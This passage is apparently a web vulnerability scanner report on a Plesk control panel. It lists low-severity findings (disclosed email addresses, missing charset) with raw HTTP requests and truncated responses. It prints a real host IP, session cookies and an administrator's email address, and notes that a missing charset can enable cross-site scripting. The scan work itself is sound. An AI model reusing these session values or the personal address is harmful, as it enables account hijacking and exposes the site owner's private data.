s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...

9.7. http://174.122.23.218:8880/smb/file/index/type/external/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/file/index/type/external/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /smb/file/index/type/external/?folder= HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/smb/file/index/type/external/?folder=
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: show-getting-started-popup=false; do-not-show-getting-started-popup=true; show-getting-started-popup=true; user=187d997e8ea6a5d0f56792f7f9ba70a4; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 03:12:22 GMT
Connection: close
Content-Length: 49536


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
\/protected","url":"http:\/\/plesk.cloudscan.me:80\/files\/protected\/"}},
userContactName: 'admin',
userLogin: 'admin',
users: {"1":{"id":"1","contactName":"admin","email":"h02332@gmail.com"}},
isBuiltIn: true,
operations: [
{
componentType: 'Jsw.SmallButton',
title: 'Share',
description: 'Move sele
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...

9.8. http://174.122.23.218:8880/smb/file/index/type/private/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/file/index/type/private/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /smb/file/index/type/private/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:07:53 GMT
Connection: close
Content-Length: 55406


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
\/protected","url":"http:\/\/plesk.cloudscan.me:80\/files\/protected\/"}},
userContactName: 'admin',
userLogin: 'admin',
users: {"1":{"id":"1","contactName":"admin","email":"h02332@gmail.com"}},
isBuiltIn: true,
operations: [
{
componentType: 'Jsw.SmallButton',
title: 'Share',
description: 'Move sele
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...

9.9. http://174.122.23.218:8880/smb/file/index/type/private/folder/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/file/index/type/private/folder/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /smb/file/index/type/private/folder/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:07:52 GMT
Connection: close
Content-Length: 55128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
\/protected","url":"http:\/\/plesk.cloudscan.me:80\/files\/protected\/"}},
userContactName: 'admin',
userLogin: 'admin',
users: {"1":{"id":"1","contactName":"admin","email":"h02332@gmail.com"}},
isBuiltIn: true,
operations: [
{
componentType: 'Jsw.SmallButton',
title: 'Share',
description: 'Move sele
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...

9.10. http://174.122.23.218:8880/smb/file/index/type/private/folder/admin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/file/index/type/private/folder/admin

Issue detail

The following email addresses were disclosed in the response:

Request

GET /smb/file/index/type/private/folder/admin HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/smb/file
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:07:53 GMT
Connection: close
Content-Length: 55128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
\/protected","url":"http:\/\/plesk.cloudscan.me:80\/files\/protected\/"}},
userContactName: 'admin',
userLogin: 'admin',
users: {"1":{"id":"1","contactName":"admin","email":"h02332@gmail.com"}},
isBuiltIn: true,
operations: [
{
componentType: 'Jsw.SmallButton',
title: 'Share',
description: 'Move sele
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...

9.11. http://174.122.23.218:8880/smb/file/index/type/protected  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/file/index/type/protected

Issue detail

The following email addresses were disclosed in the response:

Request

GET /smb/file/index/type/protected HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/smb/file
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:07:53 GMT
Connection: close
Content-Length: 50483


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
\/protected","url":"http:\/\/plesk.cloudscan.me:80\/files\/protected\/"}},
userContactName: 'admin',
userLogin: 'admin',
users: {"1":{"id":"1","contactName":"admin","email":"h02332@gmail.com"}},
isBuiltIn: true,
footer: {
cls: 'msg-protected',
description: 'Access to files in this folder is protected with a password. Users wi
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...

9.12. http://174.122.23.218:8880/smb/file/index/type/shared  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/file/index/type/shared

Issue detail

The following email addresses were disclosed in the response:

Request

GET /smb/file/index/type/shared HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/smb/file
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:07:54 GMT
Connection: close
Content-Length: 49535


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
\/protected","url":"http:\/\/plesk.cloudscan.me:80\/files\/protected\/"}},
userContactName: 'admin',
userLogin: 'admin',
users: {"1":{"id":"1","contactName":"admin","email":"h02332@gmail.com"}},
isBuiltIn: true,
operations: [
{
componentType: 'Jsw.SmallButton',
title: 'Share',
description: 'Move sele
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...

9.13. http://174.122.23.218:8880/smb/my-profile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/my-profile

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/my-profile HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/smb/user/list
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:07:06 GMT
Connection: close
Content-Length: 25218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<input type="text" name="general[vcard][email]" id="general-vcard-email" value="h02332@gmail.com" class="f-middle-size input-text" />
...[SNIP]...

9.14. http://174.122.23.218:8880/smb/user/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/user/list

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/user/list HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: 174.122.23.218:8880
Cookie: show-getting-started-popup=true; user=54a8ad2443247fe6e4900290dc4e0cf8; PHPSESSID=10321169792bce25daa15603ea9ba645

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:04:00 GMT
Connection: close
Content-Length: 15464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
ontactName","fields":["contactName"],"title":"Contact name"},"email":{"titleKey":"email","fields":["email"],"title":"E-mail address"}}},"data":[{"id":"1","isBuiltIn":"1","contactName":"admin","email":"h02332@gmail.com","roleId":"1","roleName":"admin","additionalInfo":"","imNumber":"","imType":"4","phone":"","phoneType":"1","phone2":"","phone2Type":"3","phone3":"","phone3Type":"2","isLocked":"0"}],"locale":{"records
...[SNIP]...

9.15. http://174.122.23.218:8880/smb/user/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/user/list/

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/user/list/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://174.122.23.218:8880/smb/admin-home
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=false; user=54a8ad2443247fe6e4900290dc4e0cf8; do-not-show-getting-started-popup=true; PHPSESSID=10321169792bce25daa15603ea9ba645

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:06:28 GMT
Connection: close
Content-Length: 15464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
ontactName","fields":["contactName"],"title":"Contact name"},"email":{"titleKey":"email","fields":["email"],"title":"E-mail address"}}},"data":[{"id":"1","isBuiltIn":"1","contactName":"admin","email":"h02332@gmail.com","roleId":"1","roleName":"admin","additionalInfo":"","imNumber":"","imType":"4","phone":"","phoneType":"1","phone2":"","phone2Type":"3","phone3":"","phone3Type":"2","isLocked":"0"}],"locale":{"records
...[SNIP]...

10. HTML does not specify charset  previous  next
There are 16 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


10.1. http://174.122.23.218:8880/domains/sitebuilder_edit.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /domains/sitebuilder_edit.php

Request

GET /domains/sitebuilder_edit.php?dom_id=1 HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/smb/admin-home
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
